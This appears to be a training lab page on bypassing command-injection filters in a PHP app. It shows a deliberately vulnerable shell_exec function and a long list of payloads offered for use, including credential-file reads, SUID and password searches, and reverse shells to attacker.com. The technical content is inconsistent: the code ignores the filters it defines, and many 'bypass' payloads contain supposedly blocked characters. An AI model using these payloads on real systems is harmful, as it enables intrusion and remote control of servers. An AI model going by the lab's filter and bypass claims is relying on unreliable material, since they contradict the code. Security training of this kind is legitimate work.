Lab 2: Command Injection with Filter Bypass

Difficulty: Medium

Lab Overview

This lab demonstrates command injection vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters dangerous commands and characters but doesn't prevent all attack vectors.

Objective: Bypass security filters to achieve command injection and code execution.

Vulnerable Code with Filters

// Vulnerable: Basic filters that can be bypassed
function execute_command_with_filters($command) {
    $dangerous_commands = ['rm', 'del', 'rmdir', 'format', 'fdisk'];
    $dangerous_chars = [';', '|', '&', '`', '$', '(', ')', '<', '>'];
    $dangerous_patterns = ['/etc/passwd', '/etc/shadow', '/proc/'];
    
    // Basic filter check (can be bypassed)
    $is_dangerous = false;
    
    foreach ($dangerous_commands as $cmd) {
        if (stripos($command, $cmd) !== false) {
            $is_dangerous = true;
            break;
        }
    }
    
    // Still vulnerable to bypass techniques
    if (!$is_dangerous) {
        $output = @shell_exec($command . ' 2>&1');
        return $output;
    }
}

Filtered Command Execution

Active Filters

The following are filtered:

Commands: rm, del, rmdir, format, fdisk, mkfs, dd, shutdown, reboot, halt, poweroff
Characters: ;, |, &, `, $, (, ), <, >, \, ", ', \n, \r, \t
Patterns: /etc/passwd, /etc/shadow, /etc/hosts, /proc/, /sys/, /dev/, crontab, sudo, su

Safe Commands

These commands should work:

whoami - Current user
id - User ID information
pwd - Current directory
ls - List files
uname -a - System information

Vulnerability Details

Type: Command Injection with Filter Bypass
Severity: High
Method: POST
Issue: Inadequate security filters

Bypass Techniques

Character Encoding: Use encoded characters
Alternative Commands: Use unfiltered commands
String Manipulation: Build commands dynamically
Obfuscation: Hide dangerous patterns

Command Injection Filter Bypass Payloads

Use these payloads to bypass the security filters:

1. Character Encoding Bypass:

whoami%3B%20id
whoami%7C%20id
whoami%26%20id
whoami%60id%60
whoami%24%28id%29

2. Alternative Characters:

whoami && id
whoami || id
whoami | id
whoami `id`
whoami $(id)

3. String Concatenation Bypass:

who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a

4. Alternative Commands:

whoami
id
pwd
ls
uname -a
hostname
date
uptime

5. File Reading Bypass:

cat /etc/passwd
cat /etc/hosts
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/loadavg

6. Process Information Bypass:

ps aux
ps -ef
netstat -an
ss -tuln
lsof -i
df -h
free -m

7. Network Information Bypass:

ifconfig
ip addr
route -n
arp -a
nslookup google.com
ping -c 3 8.8.8.8

8. User Information Bypass:

groups
crontab -l
history
env
printenv
who
w

9. Advanced Bypass Techniques:

whoami; id; pwd
whoami && id && pwd
whoami || id || pwd
whoami | id | pwd
whoami `id` `pwd`

10. Command Substitution Bypass:

echo $(whoami)
echo `id`
echo $(cat /etc/passwd)
echo `ls -la`
echo $(ps aux)

11. Pipe and Redirection Bypass:

whoami | cat
id > /tmp/output.txt
ls -la | grep php
cat /etc/passwd | head -5
ps aux | grep apache

12. Environment Variables Bypass:

echo $PATH
echo $HOME
echo $USER
echo $SHELL
echo $PWD
echo $HOSTNAME

13. File Operations Bypass:

touch /tmp/test.txt
echo "test" > /tmp/test.txt
cat /tmp/test.txt
rm /tmp/test.txt
mkdir /tmp/testdir
rmdir /tmp/testdir

14. Advanced Commands Bypass:

find / -name "*.php" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
find / -perm -4000 2>/dev/null
find / -writable 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null

15. Reverse Shell Bypass (Dangerous):

bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -e /bin/bash attacker.com 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Real-World Attack Scenarios

Bypass WAFs and security filters
Execute arbitrary commands despite protections
Access sensitive files using alternative methods
Bypass authentication and authorization
Compromise server and lateral movement
Compliance violations and security breaches

Mitigation Strategies

Implement comprehensive input validation and sanitization
Use whitelist-based filtering instead of blacklists
Avoid direct command execution functions
Use parameterized commands and safe APIs
Implement proper access controls and permissions
Regular security testing and vulnerability assessments
Monitor for unusual command execution patterns